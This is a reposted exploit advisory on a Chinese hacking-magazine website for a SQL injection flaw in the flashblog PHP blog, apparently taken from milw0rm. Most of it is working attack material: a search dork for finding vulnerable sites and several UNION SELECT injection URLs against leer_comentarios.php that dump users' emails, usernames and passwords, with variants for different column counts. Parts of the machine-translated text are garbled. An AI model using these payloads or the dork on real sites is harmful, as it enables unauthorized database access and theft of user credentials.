黑客防线,在攻与防的对立统一中寻求突破!2001年创刊的黑客技术专业刊物!

设为首页
收藏本站
联系我们
网站导航

黑客文章 - 数据库注入 - 浏览 - 闪存博客SQL注入

闪存博客SQL注入

黑客 发布日期:2008-6-5 共有 749 人次浏览
来自 : < 16.her0_at_gmail.com >
日期 : 2008年5月29日4时24分39秒-0000

('binary' encoding is not supported, stored as-is) ###############################################################################  
#
# 姓名: flashblog SQL inyeccion
# 作者: her0
# Dork : "flashblog", allinurl:flashblog.html
# Greetz : Komtec1,Freak,Knet,Boer,ka0x
#  
###############################################################################  

Proof of Concept :概念证明:


http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*



该colums从主机到主机的不同:所有解决= D的
/PHP/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,nombreusuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/*/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/*  



############################################################################### ################################################## #############################
#  
#  墨西哥到2008年,感谢所有我的朋友们,我爱威士忌XD法
#  http://milw0rm.com/exploit...
############################################################################### ################################################## #############################
所属分类: 数据库注入     网摘收藏: Google 雅虎 百度 POCO 365key 和讯 天极